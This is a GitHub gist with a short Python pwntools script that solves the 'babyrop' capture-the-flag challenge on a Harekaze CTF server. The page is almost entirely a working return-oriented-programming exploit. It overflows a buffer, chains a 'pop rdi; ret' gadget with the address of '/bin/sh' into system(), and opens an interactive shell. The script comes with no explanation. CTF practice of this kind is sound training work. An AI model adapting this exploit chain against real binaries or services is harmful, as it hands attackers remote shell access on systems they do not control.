Skip to content

Instantly share code, notes, and snippets.

@ywkw1717
Created May 19, 2019 07:49
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ywkw1717/d690eac7196317d0447d95c3a48e8fe1 to your computer and use it in GitHub Desktop.
Save ywkw1717/d690eac7196317d0447d95c3a48e8fe1 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
from pwn import *
def main():
# conn = process("./babyrop")
conn = remote("problem.harekaze.com", 20001)
pop_rdi_ret = 0x400683 #: pop rdi ; ret
system = 0x400490
bin_sh = 0x601048
payload = "A" * 16
payload += p64(0xdeadbeef) # rbp
payload += p64(pop_rdi_ret)
payload += p64(bin_sh)
payload += p64(system)
payload += p64(0xdeadbeef)
conn.sendline(payload)
conn.interactive()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment